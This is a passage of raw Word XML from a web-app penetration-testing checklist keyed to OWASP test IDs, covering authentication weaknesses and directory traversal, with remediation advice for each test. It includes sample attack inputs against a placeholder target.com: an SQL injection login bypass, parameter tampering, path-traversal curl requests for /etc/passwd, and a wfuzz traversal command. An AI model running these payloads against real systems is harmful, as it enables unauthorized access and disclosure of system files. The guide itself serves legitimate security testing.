        <w:t xml:space="preserve">Test whether session identifiers are predictable and can be forged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test the login form itself for SQL injection that could bypass the authentication check entirely.</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curl https://target.com/admin/main.php  (unauthenticated)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl 'https://target.com/page.asp?authenticated=yes'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(login form) username: admin' -- </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Enforce server-side authentication checks on every protected resource, never rely on client-side gating or hidden parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use cryptographically random, high-entropy session identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use parameterized queries throughout the authentication logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-005  —  Test Remember Password Functionality</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the 'remember me' functionality stores credentials insecurely (plaintext, weakly encoded) in cookies or local storage.</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Enable the 'remember me' option and inspect the resulting cookies/local storage for credential material.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decode any Base64/obfuscated values to check whether they are recoverable to plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the autocomplete attribute is disabled on password fields where appropriate.</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(Browser DevTools &gt; Application &gt; Cookies/Local Storage) inspect stored values after enabling 'remember me'</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Never store raw or reversibly-encoded passwords client-side; use a long-lived, revocable random token instead, bound server-side to the account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set autocomplete=off on sensitive credential fields where policy requires it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-006  —  Testing for Browser Cache Weakness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 browser cache-viewer extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm sensitive pages are not cached by the browser, and that pressing 'Back' after logout does not reveal authenticated content.</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Log in, browse a sensitive page, log out, then press the browser's Back button and observe whether cached authenticated content is displayed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect response headers for Cache-Control, Pragma, and Expires directives on authenticated pages.</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curl -I https://target.com/account/dashboard  (after authenticating, inspect Cache-Control header)</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Set Cache-Control: no-store, no-cache, must-revalidate on all authenticated pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Also set Pragma: no-cache for older HTTP/1.0 client compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-007  —  Testing for Weak Password Policy</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 Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Assess the application's resistance to brute-force password guessing by evaluating length, complexity, reuse, and aging requirements.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Attempt to set an account password to a very short, common, or previously-used value and observe whether the application rejects it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review whether the application enforces a minimum length/complexity and blocks common passwords (breach-list checking).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether password history prevents immediate reuse and whether expiration policy is reasonable (not overly frequent, which encourages weak patterns).</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(Manual test via the password-change/registration form using candidate weak passwords: '123456', 'password', 'qwerty')</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Enforce a minimum length (NIST recommends 8+ characters, longer preferred) rather than arbitrary complexity rules alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check new passwords against known-breached password lists (e.g., HaveIBeenPwned API).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid mandatory periodic rotation, which research shows encourages weak, predictable patterns — prioritize length and breach-checking instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-008  —  Testing for Weak Security Question/Answer</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Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether security questions used for identity recovery are weak, guessable, or brute-forceable.</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Review the available security questions for ones with easily researchable or limited-entropy answers (mother's maiden name, favorite color).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether the answer field allows unlimited guess attempts without lockout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether self-generated questions are permitted and whether users are warned against weak choices.</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(Manual walkthrough of account-recovery flow, attempting repeated incorrect answers)</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Avoid security questions with low-entropy or publicly researchable answers; prefer stronger recovery mechanisms (email/SMS OTP, backup codes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate-limit and lock out repeated failed security-question attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-009  —  Testing for Weak Password Change or Reset Functionalities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Browser, Burp Proxy, OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Evaluate the password reset and change workflows for information disclosure, predictable tokens, and CSRF weaknesses.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Trigger a password reset and inspect whether the old password is displayed anywhere in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether the reset token is sent only to the verified email/phone and is single-use, time-limited, and high-entropy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether the password-change function requires the current password to be supplied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test the password-change form for CSRF (submit the change request cross-site without a valid anti-CSRF token).</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(Burp) capture the reset-token request/response and assess token length/predictability across several requests</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Require the current password for any password-change action.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use high-entropy, single-use, short-lived reset tokens delivered only to a verified channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Include and validate a CSRF token on the password-change form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-010  —  Testing for Weaker Authentication in Alternative Channel</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Browser, mobile app testing tools as applicable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether alternative channels (mobile app, call center, SSO) enforce authentication controls as strong as the primary web channel.</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Identify all alternative channels through which the account can be accessed or modified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test each channel's authentication strength (lockout, password policy, MFA) independently — do not assume parity with the primary web application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pay particular attance to call-center/support identity verification procedures, a common weak link.</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(Manual review/testing per channel; call-center testing typically requires a scoped social-engineering assessment)</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Apply consistent authentication strength policy across every channel that can access or modify the account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Formalize and audit call-center identity verification procedures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId17"/>
          <w:footerReference w:type="default" r:id="rId18"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization testing verifies that, once authenticated, a user can only perform actions and access data appropriate to their privilege level — covering path traversal, authorization-schema bypass, privilege escalation, and insecure direct object references (IDOR).</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">AUTHZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-AUTHZ-001 – OTG-AUTHZ-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHZ-001  —  Testing Directory Traversal/File Include</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 Wfuzz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether user-supplied file paths can be manipulated to access files outside the intended directory (path traversal) or to include local/remote files (LFI/RFI).</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Identify parameters that reference filenames or paths (e.g., ?file=, ?page=, ?template=).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject dot-dot-slash sequences and encoded variants to attempt to reach files outside the web root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If LFI is confirmed, attempt to include sensitive local files (e.g., /etc/passwd) and, if applicable, remote files.</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curl 'https://target.com/index.php?page=../../../../etc/passwd'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl 'https://target.com/index.php?page=....//....//....//etc/passwd'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wfuzz -c -z file,traversals.txt 'https://target.com/index.php?page=FUZZ'</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Never construct file paths directly from user input; use an allow-list of valid filenames/IDs mapped server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the application under a filesystem-restricted (chroot/jail) context where feasible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
